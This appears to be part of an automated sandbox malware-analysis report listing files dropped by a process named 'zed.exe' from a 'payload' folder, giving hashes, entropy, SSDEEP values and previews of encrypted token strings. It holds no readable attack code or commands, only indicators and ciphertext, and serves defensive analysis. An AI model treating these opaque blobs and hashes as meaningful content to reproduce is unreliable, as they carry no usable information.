                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d....B$g.........."....).....\.................@.....................................<"...`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.985936312213765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:IIvQeuMtEHUV+R0eO25bTlfS1Bmk6O4WMInEoYumY:9QJL0V+SEbTlfOl6PXoz
                                                                                                                                                                                                                                            MD5:5EF2E01855C6FBFCC24C31475116B870
                                                                                                                                                                                                                                            SHA1:2B1129F61EC8FC6CD6AE9C738D373E9AEDCDB95D
                                                                                                                                                                                                                                            SHA-256:0D970F1CAB6886E274CC5FEBAAD2B23BFF615A6ED953FA0A9B46C88DD714ECCD
                                                                                                                                                                                                                                            SHA-512:BC4EEA695CBF1133C015ED2FF0A610DEE9256CC66759B73ED465421A7F6A04DC0E0C90A8BDA867903F402708C2F310AF8682A1706B7883603D7C9E079A987FB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC642DKCLMG5LcTynrwj8_JJHD7YHMIlHaZBbiJcagk-GtiG_5xteBREV1htLirebq_K9OiSz1UswIhwHfIZZ0YXsdTyfyjQpy4SAqU6EztEaju1bF0KmwOV8viaeLdzYN6vc6DrrIqRe9iiMXHYRP3fSOUDcRBDnCUb9m_h1RjD3DL6SyMdzOuq5mZakvZni6XIukSozonR33yjylvR-7NBVaSao8jP2r9pG71H3URR0szWbR-cM_qNUODjH-G4bQxxCvx0SFj8ZoEF7fgLTBPG2gTXkP_VoyFnYittPHgXsyW12UoXxWGjRsM8Zap1UIHcSE4uj9b7uJ4frIa8SdEIQBnTQOgSxZu1kTOzWRuuCAeCbjwEjhm72b0haEgR1pXyRGtinBUZwmdtKdonPLOfFPMxIegK_aaPp1Bxcrbhj-tKxOvBD4QUkCex4elHT_g3a3Ar8Ho9uPA7rxgUTjw77PY__XqYIvD4loXScesWnM5J54z23B9HunBFDIM6mPOZ2rePcjf6nUNx5sWA7qb4orrMGt77sCgnEb2xdK7HpudEtCG-rWh1EG1IHNLKHaJAuAzq9KOf2YWaC-xFW1r8txsQnZYZtYwtcd9MHJkV22UR4qb5-OW-daTAS0vnBf4UDsR55MwgbwZxtjvUZxgfTOHmkFrQVTzzA4ovZLYwvu-Dr-PBpkWMShJs24B_8gjjMrBTEcioUnj5G7vaScSCbGT8XvcA7NLTfJpuuoFmrt7pRPFhud4KBAMgSn61HMrn_PkGJauq_Aw2cIJBj34KF8MFQXIXH1Zj1QAdQtjtAhNhBEhipCcyc31odWz7PXJucuTCDFQvzt9CPTtlt9BaihXQjKD0Px8lag_YIzU_D5iz9XTPCKX2rf-oJyUKl9LdTKvzFR2e963KXXXJ53EXCGOvJc8nxyDOw38FEfPpjDlVje7HDU0TyBtboOFGyxdIV82qVPeqnv4JT2b83kfLuJNM6p76
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9808194907296075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:i4mrLhC8yKCWwWoDwgH+uVbA9Hy/5lpQoTg5i2hJaVaP:bGLhC85CEGRVSYvLTgLhJ3P
                                                                                                                                                                                                                                            MD5:0C0761A7C13388D2B1BF61A358AA8820
                                                                                                                                                                                                                                            SHA1:0E7B814BED63E699980D5820FF33A9E5AE4FC694
                                                                                                                                                                                                                                            SHA-256:60DE35547062EC6F258E0C9CA8EC15EF2A5DCF2E93880783D885BE942A5532B6
                                                                                                                                                                                                                                            SHA-512:21F878F7AE8EC57A3B72AA6986B9598FCEB49CE30A39E966544778D3863C66D653D4816A76B6D8CDFE29F809AADB060DF63F8D7CB92257BFB6509196C222247F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Il5MMpg89leYySxWKe73luks89NpUE-VdOqM_FNzAVMpRH29MnUEwfAG3k3TJLkcj-oFlS-uJEUll4Yj0Hfjhcl4SXHjexawfUPqIh6VqxPJ10Bc0avpzwqwgVRAAPgyp3Vp0Ru4q1dSOX8GMd8N7iwZTuNLJF7QByIeF-2t7vNzmgPJkBV0Pv3G_KEcpmwp8qYz2eOAQZB3wVWm8LPBMmbej-CCPr2uYIlG-eP8j6yoNhvcJo8sz0mFTYz_ci3WtSz2-KlhgTWZ0itpUQ-oNjisbDedKAmSrmsHidhOQ4ZnzGc6rsGRSMOm_SSYVe155KKUjwwb3euTxAPVY_gjB1baKR4rT2JpLsP1eq7iSuvzTiYPYYy8PPJr7n2zGPSvpWWFIuplLQew5xE2bKHyaHEBFiBzOR4cie3l1IMxi8E31dNpCsWkh2qKKdGTosWULyzka5eNMKterG01Qluob2LY1IIv7urA7Dfj_ti-d9OS5lDJC3eFNU4IpX6Gs-oJxO6kyFJ5MKeYuKKaTeE_ty7rrOOJb907dkdqnEc2K_c2_CR8ErCReHmN3DOV_XTcY7I7pxCRy-zURADpuFF7Fv5x65NqG6A3MSMvcUfNKH-NTCLmS45UxfGv8nKSC5rIYgyHN8JxTSLwiOGJH7zOzNGS_fgyM2hHTX3BU_zTV7jrv6EVujAES-53pNVLE_cOH_oXxfA3_tBhnqMayAcH5ptcBxCKhG9sJUu1KMBKvkEhML8cXb5X2i6yS7rcGo4s43BeGhjN3FSZWqEJIuHsZ9EAGTuNJVDeegWUMRiXc4QYihzbK-YkEYfA97VWGl6MrEI7n-2QUhjEGUO7EtTCgxak6mRYysj0D4agRN47KTlxjQQ3DC-jbKoWvAn9JfRJhi1h0Szb2W5FHowXaaKChNIgWu99jgpqRmXvA_rlgID4r0atymZEHQWTk_fuEZG4UZhk-sUOr86oqL8D31ezQ-z4Zi9t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.980074153496842
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:bintbK3PpIlVRJJclxt6j6g52tAc0hQKmagFM5r:b5O1JJ636ugkj0hQPFFk
                                                                                                                                                                                                                                            MD5:0216E32812CD81067454DA85D2AA1E17
                                                                                                                                                                                                                                            SHA1:D2616AE2F252CD22CC8BE71E1909BA9157CB5ED2
                                                                                                                                                                                                                                            SHA-256:5BE57BD934D05A384F6D3F654A6B5DC598D45C0D9C16363003809CFDFD5AB3E9
                                                                                                                                                                                                                                            SHA-512:891FD8B0BD1A0CE0069B69D7544E392F27EB6C797AF60AE087F676170D04A29526B581A3E51481B65C0689CA06422A72D067A6CDC0310097BEF20E394B3C8920
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64bDm1NzK-WcWYuxDxTjx4KL0jPfNFO1hCPEKHQA1abzR2YHafbEN4J511xeGgfTEFVHAt2ikpD43UYBVDRR3dJXfXdN_n6mWG3gT48leU93zGe2RMGGiO1HZ1-lJtEBoOavyS4AjXWPU0MlEsUtls6jG-T-mNYOnr7jFQxIwCpdM9-BJg-0HxR1R2_5wpIVfBDOf4aCg1OOA_uqgDEkY1ucE7iqELk2J7Z_IIk7ulJE94atRU2I_YUXyCh_agFowydGoJd9B0dfTChByrAEC26A-4_fGYdOiH0jlkL0GRHZPViZLmZdH6y-XgA45GnpkY4nNzzyQXHrT4t4L0pF76YwHR0UQ519opZQqhpqKD0IVkjRBBZieXFhygSAiiulS0_KUruK1adALwnwPh2mA4V8jciE2gxbIBG3ri0PNyedieL9LdjrU3e1x7oZWbKhGNOnfmE8CiwfcZmkYUguWxIPDHaxGfhBCa3stTZGo6UUz7QU9vJKjrqBcMP4m4v8PcRT6-iMxaTACBpZGluYyiOofVamP_a6vIU8ddEcvKzG8oZv_3Zf4PqEIyNse_xPPww4MI30x0Q6XUjn4XFSYm7lZPW9QmiuukG_zcYiVJSUareIcbKYL-EZ7-MaWIPLqi9RwmfUg3ABpb78VrD6xwxDh3im2Kdm-At_lLY6ug-1dQ5dP8Dzh_yekOoqhrCbhV--rZB-YQM9DZ200Qs-Qh3P7fC036uCsGR7hI8sYeELj1cEiRLlhhs4qDstJKSiUn2LEFOgSLZSY2G-zpUp8N8snXDHOdOUB02ckGZdP27iElJtoJF2qqlb6VqlJ-Ds5YCLDzL97bDAZcGQ0pllz2ocjoAolMAmDloOOI3oUOKE95f25CPc6caiBXNrxNbyzgtDU-qnJxcUj3HzUA-j7f81ztviM2ToRcAN8oL6txzyx1QH6G1Foc5q7_euW0lYR3acJlDwM1ZxCA67xLONwL0ra2jfhO
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.974416822046744
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:l1dlpukerLpA8wQpVZbcpPHNZYlkLC+2mBHNiHXAb5Bp5s3IrXr:Zli3pAdQHZgFNqeLC+2mBHMHXA15lH
                                                                                                                                                                                                                                            MD5:40397646AFDA23B167AA083F419604E1
                                                                                                                                                                                                                                            SHA1:2291E35E5C2121EFA507E7823AC920C1BA261214
                                                                                                                                                                                                                                            SHA-256:818CDE70742FF398018C59142F95BD15DB05DAD8ED1378BFC2294870887E6943
                                                                                                                                                                                                                                            SHA-512:F9E3C5411C6134871B0001C0119A41825562073F377DB41263E1645F756351041243E4655BF632A629D4FA29BDF00D108D11B598CF5CB857876C3D52C3507097
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64l0OHkCjY0lgEC1vLwF_sokAd4wmHNE64Qkss2g7Gw_F9Pu1BiVM7WDnKpqWjfZwBTpFgd_I7kGdlftgLx43dTVn0KjECtW8iQ3NGIh8V_QDeHW2DCg3eVdwKyLuH8VKTY0mAv11TIDd-rn5pRhbKM7FXJ_erp31i7zCmge8ADhpe8krV97vlkRxZuJ6Gu6cfqVjgRAXj2OGqVFe1urd2_SVljdsgFfLZtwzXx_S70Z22DOT3jDcFkiFTJG7CJJ5IU_epPHLZ0h3nZaMonCDc-6rnJUnKkbUmh4AmVTexupCzjPJdz9WgpV0jUolaPKqZqw_5W5S109wAoEAadylMTAM0p1iTsBgHr6Vtou8IRLEtY-34kJu1VLLlXhCgHnbC6HhNJWiZpgGsLKx4FTDDvB7ZXfac20CgtHnJkG-DxUCltm8SwumACvFLLg6JiNs3_bQ0dF6s1BLPiO3vivF6ogkQf87P1TFe6Cfx3MXURDKyrt7ihkFzMGUNvVivUERZhuw4LiwTtzHKgZZL7HoMk6MM0kfxWpgHhmki0IP85LIt2-S1rjmrf2QGqhOUNlVtYwgP4uKtD38GYlzPlQlpbeIgvYV3DPtZAjNvAu3-2MPsQ8ePck0ZbnPXSMWlkh0MCgZCA0LL83I9LqsiXN2J6JH4ry0kJePU1M6msiJCOqqVYxRdH9cVD7BCIgb-RVij_8U02hksv8ZPk2bU6hABtUGTLUyVkdBsDPsee7lWjbwHUrkabcY2rb2Ltr6wZDj8y8eT14cnT7kZa74nReBJp4ZRjSA95WYZ5-ebvEtJ_ZYCDteKyoXTtt7QOoc9uxkln92jRC-rAXVLRpKHuIaxjzbarp6e9kEnvYJCwZZU2HlvADAhz7M0YNVfgx2-Ng9n6yog3iPodR7RcGPI41FoX5mCbprp0Ji_fQlj9KPm9GpcjYeHrp7Xxbpuy700ygCiGc4fYBGxyjVUlmPA_YFOmVsVNBAO
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.978610776704535
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:Z0vN2LoMhKG3SwdGl5nw7zF37ZydKphsEeAp:ZkNOl3SwdGszlt5fp
                                                                                                                                                                                                                                            MD5:350E8CFF01061250A139F627743DD0DA
                                                                                                                                                                                                                                            SHA1:938E92BFC95024E64B5113292C6605C78B2CE835
                                                                                                                                                                                                                                            SHA-256:98896638329A7512B9F2D63FAF3CD8092C67A37EAAC809DD731221A0ECC54277
                                                                                                                                                                                                                                            SHA-512:30C7A93C4A34D727626C4C28CEA7D10D046EBF2F8C92C21ABE9F3EB56301E11BB00E456EADABB5A45115EF67077ECA3C8B224D3E1453D777F2F5E270CB56E100
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64ui45owUYA5V6RIyBJzXHgKSMT43tp6TjkZIjYvvnL4N761frwO3LvBOnZJoz5ytrruCW_-54nygzXMwor6OdThu51i3GDr6F1PzQkByglGr_tujqnlgrEVyya129n_G7E-4L_3JKUJWekQl9h9UerRcy4DNhCTL6zRGiO-rYoReNAhuv3blLvcvuZWYApYRWfQQiODcdqrnOA2IePDZ0Tq5efIxpJg6XKBFW6l04PG80ry-FijXB3nsAw4s2knTaHHc_KnvqbnOTiQFQug2v-cuiFNJHwaUxDpBee_cw11t7TGQbHD4tVYW3gSnz5Ms7BeOp7rnyFkSv2EyaJBYTlxtebNQPmN-ClgHDpz8raCLoL_5eoI4UEUOl2oj_g57rtpEtqHRvBArkwu4Sr50uzKlkE0c6Upn9CCBDcSy3vSbDP3Furny5xQSUJRvbtiCYktywxWm3U6_mBuNTzeymWfdc1Tte2TQK_fEakqkkEiosjHcw8FDv2X5CTGoaMLqefEY_CD1ittifFgz270zXUmONs27mmOutEIoEPnuWdWhhZdoZWyothJQB6nDXhveBhXLVjXlqBpfqBexXPFlsewW7ebB0qATGKkGA55k9B5aZppOVkSArZMb6KFWMQMmHJQsXlMv14QLsIHPKYKK2myDf191vHRWZ09mYhjpJv7Ems3YE8GDGTAJZz8URgCnJE-6MQls0WksVmXb5ZvfZBoohzxRNtVYGBGIo9lFyCbaF7BojeH8n5nqCJ89Fnr3VjM9cNf5tOJTnE9_ktr2ePCXX7THBsbNM9PqeuFSdpB-WzhBIe5Z83bmPV_jBGarpnOvFXOrNkIQoEf8U3YfdkaOvvNHwuYA9rrzcks3ufTJPVib4f680Am6-NeBvsYG6jHgibnZD7cFYoWaUzBt4CL_AT-SBgk0aNnCccgTcVTPA_YMNbYvzPX4XwMzlPQOTq87A_lTj2CXsTRU0snCNG9-Cae9_
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.982012624868475
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:BrunTjrp6BwleTnnhohwF4J+EjS7dNRzo98oGYv8EeeC4D:BrunT/8GlYmW4Ja7Ro9lGYvzeh4D
                                                                                                                                                                                                                                            MD5:7F128B8003CF6867DF0C4FAC34713B46
                                                                                                                                                                                                                                            SHA1:E4ABEC28580856AE28762B0F6BF2D025B856E58B
                                                                                                                                                                                                                                            SHA-256:2A54351E6DAF4B85D89C26205BAC3AEF8D3DDE668A26F366C08C622B553E085F
                                                                                                                                                                                                                                            SHA-512:F7BF17C9D2C788B902C2511FA1DFF9379CF0A0C47F7CE98A275B8C24EB4ED5B8847FB57AD9C1A442CAF1CA5CA545318B5D937124C4DAE1678AF68F58B40BCD22
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64QvLNDM1nwkZs2geWfwj0V4o5dFKC9GKscRAUD3GaN_-tWgNfHAF5CsyUftZgPa6XbZlZ4iXrUdH6SIdm_ClF4IXFJiBzslYYZXP7BCegJcNdm_iBkjvA0PowezHZmVKfl4Ix9-VofZavHU2S4xQSb2WUX4SAKZEToSTbgfoRxsO-MnkvbbV567mn5jDd4XvFzoCpZAmUczHbTngq8BlGcA2KLcIJGloKFF9NwWWomU_6jm595XCgnL63fZbtFYZTCh3Tm_Hp-Gr_mL_nAj97-hbVwVa2d70_VEKdZkJSoFNdBpD0PNqF84GU8ulh9VRBgxtW6XcIM-cPmuau-7jfMWOeXB9Bu8AJvELpEyHdzmftYv3V9yaHQhxMwhfGW3Qx9p_aOGtFiPBYqC0PMNqvKwQ4Gp05UMhqSwYS1fAu47DHQBNeyPEoFYy222ewJcjJRGeIXR8nBKcpmmBjG0qSnz4dfNI1Gb0vqg16cHKJSCXol2FgoY54YFQ34Rc7iCJYad2wE2EX3Ik7L5GgI6JuNN_ILZtM4mvrH3SWr0uyEmNMb4DGQZL8hd7drgrKloKW_Gmotm4K-Svz16rNlmeJUJ8YlGJkqhLUZ9FvTSbyGPRDyvc0SRkgD0Pch1ZLF0ZuU6cLsPYQrCe4VJPUS8_S1_pLY4ti4-DqcrY4vt4Viqt8XrsMP_vs7JoekP5vrCZ_1hpVmtph4EBkjuENe8Rkcu9rGFLZUgtnCrozJODl-25lDVHiEiM--boE7PwF5UUOPmgCWaaLroypOB_XdpukSLNU0SfEQn6LZkEHsNR7NZQ9OrW2CEWKl6ylHt2xfuGak7kFGOTBQhRDnCpA8AO1vGOWGFR3-WEd_4CZ0I6WNceYGZrwGsacYfAji47nbitA1MjqjwS3R3ToNbaoD_jPpEwb8EHAcIj69j0_wGw9b39az2d4-6UrvAwLf8gp87nbBZvzE7NE0RJwvuLmUCwMh9MpKCZ4
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9728180598870955
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:rj4jN4+tTqinwMUU58NWkdvPqsGQ6FQEeArfwvIwgU/h1X6O3yk4:ohg4/8NWKvf6FFeVsmhVok4
                                                                                                                                                                                                                                            MD5:1B09444E03FE587A0349C6BC5A2BA89B
                                                                                                                                                                                                                                            SHA1:0D2900FA434537FC2A0C702111FE839665D83C1B
                                                                                                                                                                                                                                            SHA-256:33964C816579110C7B32AA4CFC4D8D4EB128B6984977AAC6A89BC7BA681A81D9
                                                                                                                                                                                                                                            SHA-512:C0B609F48C52795294A92FBC5E61B45B9740F04AD92C38C969AA3CB974AE787E8785CCB85EBA238C243C46C83E10AD17E24ABC740D73E1E9E43C1FAFB31D94D2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC65iYmMW2bYcl82RMKQRv26N_oTXRBEpbXScxkJcz3pc2vE6vUwSw39ANBQCUIa2_ARh3MHHgE8wPyZQpedzf39SU9RtWv4zWK3rJfOtsbaoO1Mob9qicK2aZStgIvTNoHAQMsQCOIcv98SR6eHjuJ3whtEPcWhLSQyXcPNIaiwIae6AMa3T-bEkHHKJafiYYue_j_IzYW8evd6iWc5i3YCp059t3Dn37lSIkVmC26YDzbCUuOdvK37srXHhrXdQAUfiN6r4zP4YgxsdKcaI2tSAmEHM4aFP0oytPaDijZ8YzuUaB0iSzGgvaPaFtmTF2Pzg9w_hz3EkG5RlH8u1GqfcpwtR993ZrDVG-Wh075fJbfCg0ghjftAg9bo_IGjVNAKi0C890xyOzan5H3qpWR4R9UjvLs5YEeIAxJNzYPRRnZCF5gLlRaBY8siLTfn74XUne_TvV8JfnOgmXzcvninhov6ba0GuUxyGJN1UQIg4a2SokhQJ3mJdMI0Z1mhCiT9ZlRYOZ6nw-4t5erDkhXUtdBcc09Q246fh1b_989oTsysQUdEi3qpC2G3OQUHrWKN3nvY-BLAwYL3CTzMyut2uxg3sQuQBnyR4Ta0rvzHXAJKs5mgJ04br9HLlOBq-j2uRbrDBb8VPRr0SmMCXWUBXM96xW2u79xsvUIYpm7gl8UfpNjNcmA7ShOo9R6ThZa-udLQLfu5wx6R8RedUnoGL5Hf6n85TN15It1JlACf-F_s916lbLBWZCYMv1xtBmydXmpjOUoy1pge97jn08CXIN4Pm-_j7YrB2UbTx8zCSXZXbX9e1AaqSgMkJtC9FM7Cyl4LLgBszY6wm5KQM2iwOdNL-t-KtP0OEd6p3O9WlHDB7TAFPa3DXuNhZ50nCkKyl7hAEy3B6WkDKSXVCONZjvlZOgYPwGBLRu_TEqIkZ4hBriJp4DSQPKasNxZJvb0HYQUXyAuZcTlQq7h_9uQnTFbAKThR
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.982749357640807
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:oM08dyHAQx5/Q9hJwiKjAvwghqvK2nbm5Vw2mBtrzdE:r0lAk5/EBKahqvK2oqBJzS
                                                                                                                                                                                                                                            MD5:D426C50D1D8B8DA50294546EC673351E
                                                                                                                                                                                                                                            SHA1:A5C0FDA2D5B965E6DDCF980FA2068CB6D56D3671
                                                                                                                                                                                                                                            SHA-256:D5472876C86932E92E0B750C934CD7648955E580F3CBB5F5CB9ABF558E257BE9
                                                                                                                                                                                                                                            SHA-512:6C6BCB3B061D48B5D370578B63D1D02EA19E947DAB24479C15981A409F7A4349E0C16585E357D151E3A9D5009F031D90C97054EFC543813FD21807C48F08968E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC65NC4v198225ql0voZIgtrFeqQfG8sd5GD9gQyKaCBsb13BVfDnGgxcyxjrjbdtinUYuHStpKxSBjDRGaDknZSn4QQAiK9Af40DIIcNvcb7W-wEfcqCx-9oinFmGWHu6nw4BxJFkjqT4Lm4pzq_KnhyytBmvB-iviZwWoaJQxtbUwGauqoDTwX73Y9VL7AT1J-2OcW0i8rkngT2NzoBfIY6vQLs-tiva3Podcy5OnNpWr-psF6R7yFlyPlubKkoWFcZrN6XbwoZSQHsc_Gx0Wy4QmszHwZNTCYhtm0kRpEeosWOLlqCpVv9ApwKRLM95b186J6uAqDXY_5iSCXvk_hF5D4lWhWwQbGd2wHfmGY8H2vm3gBuN5Y5PK128YwZkWRvrMIVvjanavUiQ78i6HihUP926y6vghyi39J6ViBsT9QAOR6EPeuh3Tn2oXIYN-FqH1zFbYY_CtFzACJmhOMMQFp4FtntWIgt_zJgTcwKaKGKwN2nhxo3vKUJmH2i9-RbYsAHwDZ5EIPEzHT9dQ3A7uWwJYuwJzGgKJLZBnrXZgVI3snkKZbnfbeCKx1oilSH9rPLAvxLnNI-LtrHQZL-Obqq5lVlaslClfGWBWl0Qx30PV-hnB4-i5URv_t2MSFlQGlGb-OySAMDuijjS3wF4P-VROQUSFifUjH5ZbKnyc91V6iAv8TGEiBMzJBY9mSFtTMJcLX-J96CYpTnt7i7LljIakyZ_00AuV7doiW5MQ5xQC_vFZVw_GBKxd49K2gfgmTGS4irfSl915x8aWnAk9hE0A7rEMFQpi3tkp5Z0OVaTyGS_XMezxlDd3m-Q1QYdshq-OZjI2wg9R7GVHPESh9vY5Dg9sz7eahzqYeiFe4-8DbG9oCl5SouaIup9XxDrC1j8UubE7Ro896gRJW2ViZayvC_s_XDlXUHGNNqrXfdEHZQaR3YFAWwpnAc2__qdVJEVIRJ2ApodSW49UfHAPEvJhF
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9876043630773905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:aWehOrtM/Kls0gIjzQg31L4AX6g9t2nV4faIDMhdaQ3OsDfD12o8os:NW/CDjzQgFLtHk4fdYhdv3OILwo8os
                                                                                                                                                                                                                                            MD5:D330A1DFD226DA288BCA67A8C866A8D4
                                                                                                                                                                                                                                            SHA1:E1D1BA3EF7F7D5AC65D76B97FD851B1A3C886DED
                                                                                                                                                                                                                                            SHA-256:59436C8ED3EE5107B5CDA8AAF7FEE8577BE3011597D0B21CB0EEAF0321252444
                                                                                                                                                                                                                                            SHA-512:065F586D9945045D9D173898A56C248628D4E0BD1B494B1852D523E90B9E36DAD650BB2FC9E2455BB8AE7398FAFFA23B541127C525AF1987346245FA14B2823D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC65Ur63P2eYbfJs2impYpjh13rsJ0npPpJELOdL-CrvgBseL_HtMyr6JVOADFhDW4RvV-9IACJ2HXv3X3tnV-MPbxGzvVptL_FDDmvBVCOkgRvw3jG6QXdZ_HA461RuO3dnE_5ZUIVx7kp-dTKEAsP06XCatLGiDMzNe11oaoe2lyxMlAAUo2X6E75SMDkt7O2uHplChN3f45wwcmxcyhg5hYWv5VSbpl-EK9roFrf1jmSb6IpwrFjlVpZm7ZprXXe5AYL1t88aWEb4a753OEbh9Go8ZRCU5BenKAAX5KrHZT3uDHiBK_vD8Ww8ZrDUcbcNxmU85-5BlWzGDQ2W9nH4ogCUkFLE8VdIvRbBFxfCYUo4ZezVas-DYSKUjYtdQVzrfjSIkLfVLcjY-RiV_9i-VsiEqDSlEzDnGhOxu6fxWdSr03TJD85GHp9fqnRl4lmwBgeidB9Iojf8jdl9kYY3eKC4uEtoivqWMvcyYaUQm_7AoENrXxqylKLiTbdffoSs8wbhjPt8XV5oMVfsfJnZsreW18kWk9T1BVbLHAwE7k2htmg5kBr9ovJKRovunqbnyPTM8TVZScgVBM_Qe9yMO-qQOT_KgzfLWb_JguNdjMElhRN_7N9CbkoIrONb03OHm5BywVEYe804YleL78sF5h7E2bSR8rQvuKv5W9bFoBbx7X1z8r1ufWH-jDJ3PphJ13KsimsZkRdNQHRNwB794CMso2xAI75Zk3nhlP3VbYLQ8ZFq-ley-dsjLCUCkI-SFVRZ_zeeFcPACKS3CRaq9_9_IOIyQMjlRpKAcB0ymJWsgCkeYiQEhnFi_dCnuPTK0YADe_D777clXtOQkad_XvLT3HBrsgunXheJW_aGZPXBnGhMEfoH0Dcogzk62PiiiVVkHKHD26MA5FaxtDKLIV1VXEnfyrge0UCsoptqXRLehX-SkLRv4TJP15ZncAPb1mlW1E44iLQDmMFlGO-KEKrnXiBX
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.983346588523597
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:fZ+t692qnbvSgHXJtxhrTEnu/i8Aqyw8JEnFJGpXo:fvDbvT5txhrTEnO4bw8WAXo
                                                                                                                                                                                                                                            MD5:4C0EC84C2060FB63DC668E5F31F57311
                                                                                                                                                                                                                                            SHA1:C08E49486526F7B8BFDFB428AB916C6686437FF5
                                                                                                                                                                                                                                            SHA-256:7586F0FB0E6E192B1713B653281991740D271F6485247D9ADAA5B12AB5FA6AE1
                                                                                                                                                                                                                                            SHA-512:71BDF58FBF6FD6F90F758A9AD770FF18F04D0B48A79A969FA47F8A7920D05D4982BF732F260F9DD543F99DD59A364685C9E038D0CFBF2FE1EE326A0310D5E107
                                                                                                                                                                                                                                            Malicious:false
